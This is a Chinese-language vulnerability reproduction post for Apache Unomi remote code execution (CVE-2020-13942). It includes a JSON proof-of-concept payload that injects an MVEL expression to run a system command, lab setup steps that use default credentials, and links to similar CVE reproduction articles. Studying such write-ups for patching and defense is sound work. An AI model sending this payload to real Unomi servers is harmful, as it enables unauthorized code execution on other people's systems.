Apache Unomi 遠程代碼執行漏洞復現(CVE-2020-13942)

2021-02-16 鋒刃科技
漏洞介紹

Apache Unomi是一個Java開源客戶數據平臺,這是一個Java伺服器,旨在管理客戶,潛在顧客和訪問者的數據,並幫助個性化客戶體驗。Unomi可用於在非常不同的系統(例如CMS,CRM,問題跟蹤器,本機行動應用程式等)中集成個性化和配置文件管理。

11月17號,Apache Unomi公告一起遠程代碼執行漏洞,Apache Unomi允許遠程攻擊者使用可能包含任意類的MVEL和OGNL表達式發送惡意請求,從而產生具有Unomi應用程式特權的遠程代碼執行(RCE)。


漏洞編號

CVE-2020-13942


CVSS評分/漏洞等級

9.8/嚴重


漏洞影響範圍

Apache Unomi < 1.5.2


漏洞POC代碼
{    "filters":[        {            "id" : "filter1",            "filters": [                {                    "condition": {                        "parameterValues": {                            "": "script::Runtime.getRuntime().exec('calc')"},                        "type":"profilePropertyCondition"}                }            ]        }    ],    "sessionId": "demo-session-id"}

漏洞復現驗證:

jdk環境安裝,該環境需要依賴jdk8,jdk下載地址:https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html

下載安裝ElasticSearch,下載地址:https://www.elastic.co/downloads/past-releases ,對於Unomi>=1.5版本的,下載ElasticSearch 7.4.2版本。

配置ElasticSearch,修改config/elasticsearch.yml,配置cluster.name: contextElasticSearch。

運行bin目錄下的elasticsearch.bat(windows),啟動ElasticSearch。

下載Unomi 1.5.0,下載地址:http://unomi.apache.org/download.html

使用運行bin目錄下karaf.bat啟動。在啟動之前需要配置JAVA_HOME環境變量,修改bin/setenv.bat,配置JAVA的環境變量。在配置完成後運行karaf.bat啟動。在啟動完成後會進入Apache Karaf Shell,輸入unomi:start啟動unomi。

訪問https://localhost:9443/cxs/cluster,使用用戶名密碼:karaf/karaf即可登錄訪問。然後程序會告訴我們一個http訪問的publicHostAddress:http://localhost:8181 。

POST訪問context.json,並發送POC。

    


環境安裝參考地址:

https://unomi.apache.org/get-started.html#quickstart

相關焦點

  • Apache Unomi 遠程代碼執行漏洞(CVE-2020-13942)
    近日,新華三攻防實驗室監測到國外安全研究團隊公開了Apache Unomi遠程代碼執行漏洞的詳細技術分析,漏洞編號為CVE-2020-13942,CVSS評分10.0 (高危且極易利用)。Unomi依賴於OGNL或MVEL之類的表達式語言,允許用戶編寫複雜且細分的查詢語句。
  • CVE-2020-13942 Apache Unomi 遠程代碼執行漏洞復現
    在Apache Unomi 1.5.1版本之前,攻擊者可以通過精心構造的MVEL或ONGl表達式來發送惡意請求,使得Unomi伺服器執行任意代碼執行。該漏洞編號為 CVE-2020-13942 ,漏洞等級:高危 ,漏洞評分:7.2Apache Unomi < 1.5.2漏洞項目https://github.com/vulhub/vulhub/tree/master/unomi/CVE-2020-13942虛擬機部署docker安裝
  • 【賊詳細 | 附PoC工具】Apache HTTPd最新RCE漏洞復現
    q=app%3A%22apache%20web%20server%202.4.49%202.4.50%220x06 漏洞復現:\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -u  https://*.*.*.* --verify
  • Apache Struts2-61(CVE-2020-17530)遠程代碼執行漏洞
    ApacheStruts於2020年12月08日披露 S2-061 Struts 遠程代碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表達式注入漏洞,從而造成遠程代碼執行,風險極大。本次漏洞是對S2-059漏洞修復後的繞過。S2-059的修復補丁僅修復了沙盒繞過,但是並沒有修復OGNL表達式的執行。但是在最新版本2.5.26版本中OGNL表達式的執行也修復了。
  • CVE-2020-11107:XAMPP任意命令執行漏洞復現
    當攻擊者將編輯器的值設置為惡意的.exe文件或.bat文件,與此同時如果有管理員帳號通過XAMPP控制面板查看apache的日誌文件,便會執行惡意的.exe文件或.bat文件,以此達到任意命令執行。2.下載XAMPP,本次復現以7.2.25版本為例,下載地址:連結:https://pan.baidu.com/s/1U2w-5cIysbEIwtF9YYfOsQ 提取碼:oi88其他漏洞版本下載地址:https://sourceforge.net/projects/xampp/files/● 環境安裝和配置:
  • 技術乾貨 | 漏洞復現:CVE-2020-0796(SMBv3遠程代碼執行)漏洞復現
    目錄CVE-2020-0796    漏洞描述    漏洞危害等級            影響版本    漏洞復現    實現本地提權CVE-2020-0796漏洞描述>      2020年3月10日,微軟在其官方SRC發布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客戶端和服務端存在遠程代碼執行漏洞。
  • 漏洞復現 | Struts遠程命令執行漏洞
    Apache Struts 2.3.x的strus1插件存在遠程代碼執行的高危漏洞,漏洞編號為CVE-2017-9791(S2-048)。在Struts 2.3.x 版本上的Showcase 插件ActionMessage類中,通過構建不可信的輸入可實現遠程命令攻擊。漏洞原因是當ActionMessage接收客戶可控的參數數據時,由於後續數據拼接傳遞後處理不當導致任意代碼執行。
  • 【漏洞通告】Apache遠程代碼執行漏洞(CVE-2021-42013)
    2021年 10 月 7 日,Apache 軟體基金會發布了Apache HTTP Server 2.4.51 ,以修復 Apache HTTP Server 2.4.49 和 2.4.50 中的路徑遍歷和遠程代碼執行漏洞(CVE-2021-41773、CVE-2021-42013),目前這些漏洞已被廣泛利用。
  • Drupal 遠程代碼執行漏洞(CVE-2019-6339)復現
    漏洞概述Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的內置phar stream wrapper(PHP)存在遠程代碼執行漏洞。遠程攻擊者可利用該漏洞執行任意的php代碼。
  • Apache Struts2--061遠程代碼執行漏洞復現
    Apache Struts於2020年12月08日披露 S2-061 Struts 遠程代碼執行漏洞,開發人員使用了 %{…} 語法,從而攻擊者可以通過構Payload,從而造成遠程代碼執行。該漏洞編號為 CVE-2020-17530 ,漏洞等級:高危 ,漏洞評分:7.5S2-061是對S2-059沙盒進行的繞過!
  • vulhub漏洞復現練習——phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)
    phpMyAdmin(CVE-2016-5734)(遠程代碼執行漏洞)漏洞復現環境是在kali裡面配置的vulhub
  • Apache-Tomcat-Ajp漏洞(CVE-2020-1938)漏洞復現
    此漏洞為文件包含漏洞,攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件、原始碼等。二、漏洞編號:cnvd-2020-10487cve-2020-1938三、受影響版本:apache tomcat 6apache tomcat 7 < 7.0.100apache tomcat 8 < 8.5.51apache tomcat 9 < 9.0.31已修復版本
  • Apache-Tomcat-Ajp(cve-2020-1938)漏洞復現
    Apache Tomcat伺服器存在文件包含漏洞,攻擊者可利用該漏洞讀取或包含 Tomcat 上所有 webapp 目錄下的任意文件,如:webapp 配置文件或原始碼等。二、漏洞危害:由於Tomcat默認開啟的AJP服務。
  • CVE-2020-2883漏洞復現
    Update)中,兩個針對 WebLogic Server ,CVSS 3.0評分為 9.8的嚴重漏洞(CVE-2020-2883、CVE-2020-2884),允許未經身份驗證的攻擊者通過T3協議網絡訪問並破壞易受攻擊的WebLogic Server,成功的漏洞利用可導致WebLogic Server被攻擊者接管,從而造成遠程代碼執行。
  • 【超詳細 | 附PoC】CVE-2021-2109 | Weblogic Server遠程代碼執行漏洞復現
    0x01 前言CVE-2021-2109,該漏洞為Weblogic的遠程代碼執行漏洞。
  • Apache ActiveMQ 遠程代碼執行漏洞 (CVE-2016-3088)
    2016年4月14日,來自國外安全團隊(Trend Micro Zero Day Initiative)的 Simon Zuckerbraun和Andrea Micalizzi (rgod)安全研究人員 曝光 了Apache ActiveMQ Fileserver 存在多個安全漏洞,可使遠程攻擊者通過
  • Apache 提權漏洞(CVE-2019-0211)復現
    ,並且前天在GitHub上公布出了利用腳本,這幾天我負責漏洞應急這個漏洞。本篇文章沒有叫:《Apache 提權漏洞分析》是因為我覺得 CARPE (DIEM): CVE-2019-0211 Apache Root Privilege Escalation 這篇文章的分析寫的挺好的,所以我沒必要再翻譯一遍了,本篇文章主要敘述復現該漏洞的過程中踩過的坑。
  • CVE-2020-5902: F5 BIG-IP 遠程代碼執行漏洞分析
    未授權的遠程攻擊者通過向漏洞頁面發送特製的請求包,可以造成任意 Java 代碼執行。進而控制 F5 BIG-IP 的全部功能,包括但不限於: 執行任意系統命令、開啟/禁用服務、創建/刪除伺服器端文件等,使用官方的httpd配置緩解修複方案仍可造成反序列化代碼執行漏洞。該漏洞影響控制面板受影響,不影響數據面板。
  • Apache Struts2遠程代碼執行漏洞預警通報(CVE-2020-17530)
    大網安協【2020-76】近日,大連網絡安全信息通報機制合作單位新華三集團提醒,新華三攻防實驗室監測到Apache Struts官方發布了一則S2-061遠程代碼執行漏洞的安全公告,漏洞編號為: CVE-2020-17530,漏洞等級: 高危,漏洞評分: 7.5。
  • Apache Struts2遠程代碼執行漏洞通告(CVE-2020-17530)
    近日,瀋陽網絡安全協會信息通報機制合作單位新華三集團(H3C)提醒, Apache Struts官方發布了一則S2-061遠程代碼執行漏洞的安全公告,漏洞編號為: CVE-2020-17530,漏洞等級: 高危,漏洞評分: 7.5。